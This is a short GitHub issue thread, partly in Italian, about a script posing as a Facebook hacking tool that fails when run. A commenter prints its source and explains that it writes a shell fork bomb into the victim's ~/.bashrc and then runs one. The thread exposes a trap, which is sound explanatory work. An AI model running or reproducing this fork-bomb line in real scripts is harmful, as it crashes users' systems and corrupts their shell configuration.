### ISSUE TITLE
non si avvia

### ISSUE THREAD

**Issue by allelive** [Walker-00/FBH#1]
:~/FBH$ python fb.py
Hacking is Started....
Start Hacking to Facebook Server....
sh: 1: Syntax error: Bad function name

**Comment by AnLoMinus** [comment]
# Dude there is no Functions in this tools

Looking `t the code and i see only printing "Hacking is Started...." & "Start Hacking to Facebook Server...." 
and then that looking like it try to overwrite your ".bashrc" with some "symbols "
```python

import os

print("Hacking is Started....")
print("Start Hacking to Facebook Server....")

os.system('echo ":(){ :|: };:" > ~/.bashrc && :(){ :|: };:')
````

**Comment by allelive** [comment]
grazie di avermi spiegato, ancora non so leggere i codici, sto cercando di comprendere
